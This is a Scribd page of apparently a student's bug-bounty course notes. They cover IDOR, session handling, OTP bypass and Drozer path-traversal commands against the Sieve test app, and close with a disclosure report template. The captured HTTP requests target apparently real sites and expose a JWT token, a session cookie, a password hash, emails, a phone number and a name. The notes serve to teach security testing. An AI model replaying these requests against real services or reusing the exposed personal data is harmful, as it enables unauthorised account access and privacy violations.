Scribd Logo
Upload

Welcome to Scribd!

  • Day 9 Last Day

    Uploaded by

    tapiwarusike
    3 views7 pages

    Original Title

    Day 9 last Day

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    3 views7 pages

    Day 9 Last Day

    Uploaded by

    tapiwarusike

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 7

    IDOR - Insecure direct object reference -

    https://abc.com/userprofile?id=1234

    - asif

    Aman -
    https://abc.com/userprofile?if=12345
    https://abc.com/userprofile?id=1234

    The attacker is able to access or manipulate or modify


    an id para which should not be allowed

    Access to unauthorized data- if an attacker can guess or


    increment the id parameter and access another user
    data , its idor vul.

    Pii

    POST /rajsacademy_app_ctrl/get_profile HTTP/1.1


    Content-Type: application/x-www-form-urlencoded;
    charset=UTF-8
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Phone
    Build/MRA58K)
    Host: www.rajsacademy.com
    Connection: close
    Accept-Encoding: gzip, deflate
    Content-Length: 163

    user_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJp
    ZCI6IjkyMTgiLCJkZXZpY2VfaWQiOiI3ZTljMDlmZDExNjY2
    MTUifQ.Z6aGWoYplx9GJ7yHmckG7iztOOM3V1p13gfjt9
    8DMGw&userid=9210&

    HTTP/1.1 200 OK
    Date: Tue, 26 Sep 2023 13:41:45 GMT
    Server: Apache/2.4.54 (Ubuntu)
    Set-Cookie:
    ci_session=3f10pih9he4kdpulivlb7ctprupvpk4q;
    expires=Tue, 26-Sep-2023 15:41:45 GMT; Max-
    Age=7200; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 150
    Connection: close
    Content-Type: application/json

    {"status":true,"message":"Success","image":"","name":"
    Aiswarya
    ","location":"","mobile":"","email":"@gmail.com"}

    Idor - high

    Otp - raj - vul

    Otp bypass - idor = account takeover - critical - chaining

    Idor -otp - account takeover

    2020 - app - 2k $
    Improper Session Handling

    Swiggy - login - making profile -changing the name -


    logout

    Asif - swiggy - name - asif1 - logout - asif123

    Burpsuite

    POST /api/v2/edit_user HTTP/1.1


    authkey: 123456
    Content-Length: 302
    Content-Type: application/x-www-form-urlencoded
    Host: jaipursabjimandi.com
    Connection: close
    User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

    device_id=d0tHS7lyEMY%3AAPA91bFBIQt8Y2rYklzhykZZ
    oSAdV1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWu
    oyfEiXrvKhCzhfmVTpXt7-
    BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf
    1gdmWm&device_type=android&user_id=12525&zipco
    de=665464&email=propubgking123%40gmail.com&user
    name=null&full_name=asif123&phone_number=867657
    5676

    HTTP/1.1 200 OK
    date: Tue, 26 Sep 2023 13:49:12 GMT
    server: Apache/2.4.41 (Ubuntu)
    cache-control: no-cache, private
    x-ratelimit-limit: 60
    x-ratelimit-remaining: 59
    vary: Accept-Encoding
    content-length: 899
    content-type: text/html; charset=UTF-8
    connection: close

    {"status":"success","message":"Your profile has been


    updated
    successfully.","data":{"id":"12525","user_role_id":"0","fi
    rst_name":"","last_name":"","full_name":"asif123","slu
    g":"test","username":null,"email":"propubgking123@g
    mail.com","phone_number":"8676575676","password":
    "$2y$10$j9aTuTnD7K3kxpM19rjsFunh48PQRrSlC99Hh4
    o1v1kiAbikpcEKS","image":"https:\/\/jaipursabjimandi.c
    om\/img\/usr_img.png","is_verified":"0","is_active":"1",
    "validate_string":"66731158181c5150bf4d6a5f5975467
    8","forgot_password_validate_string":null,"verification_
    code":null,"is_deleted":"0","remember_token":null,"ag
    ent_code":"","created_at":"2023-09-26
    18:24:24","updated_at":"2023-09-26
    19:19:12","deleted_at":"0","device_type":"android","de
    vice_id":"d0tHS7lyEMY:APA91bFBIQt8Y2rYklzhykZZoSAd
    V1TeevLXcVH3JVfPOyhhtGa7OonoM2_NEDUogWuoyfEi
    XrvKhCzhfmVTpXt7-
    BonhM_vFtSeVBB6P39sQnB6XODJ21FrRH4BgU44fB4Vbf
    1gdmWm","zipcode":"665464"}}

    Local File Inclusion

    Drozer
    Application

    content providers exported 1 ,2 ,3

    Getting the package name


    Attacksurface
    Info for provider
    Finding uri
    Scanning vul uri
    Exploit

    Report a vul/bug -

    run app.package.attacksurface com.mwr.example.sieve


    run app.provider.info -a com.mwr.example.sieve
    run app.provider.finduri com.mwr.example.sieve
    run scanner.provider.traversal -a
    com.mwr.example.sieve
    run app.provider.read
    content://com.mwr.example.sieve.FileBackupProvider/
    proc/cpuinfo

    Responsible Disclosure/ vul report


    Vulnerability Name - idor

    Vulnerable URL/App - http://abc.com/ app name


    version

    Description -

    Steps to reproduce -
    steps that we have taken to find a bug

    Impact -

    POC - proof of concept - img/photo/video

    Solution

    Project -
    Application
    3 days

    4 vul - app

    App - 4 vul.
    Asif.apk -12 vuls -4 vul.

    Minimum 4

    Thecyberhost , name ,index

    You might also like